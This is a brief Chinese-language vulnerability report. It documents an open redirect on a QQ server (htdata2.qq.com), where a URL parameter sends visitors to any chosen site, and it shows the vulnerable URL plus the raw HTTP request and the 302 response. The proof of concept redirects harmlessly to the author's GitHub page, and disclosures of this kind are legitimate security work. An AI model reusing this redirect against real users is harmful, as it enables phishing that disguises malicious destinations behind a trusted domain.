0x01 漏洞地址
http://htdata2.qq.com/cgi-bin/httpconn?htcmd=0x6ff0080&u=https://github.com/pmiaowu&wd=&eqid=c1558f51000079ee0000000555c103aa
0x02 跳转请求包
# Request:GET http://htdata2.qq.com/cgi-bin/httpconn?htcmd=0x6ff0080&u=https://github.com/pmiaowu&wd=&eqid=c1558f51000079ee0000000555c103aa HTTP/1.1Host: htdata2.qq.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36DNT: 1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8Cookie: 不给你
# Response:HTTP/1.1 302 FoundCache-Control: privateContent-Type: text/htmlServer: QZHTTP-2.37.5Location: https://github.com/pmiaowuContent-Length: 26<html><body></body></html>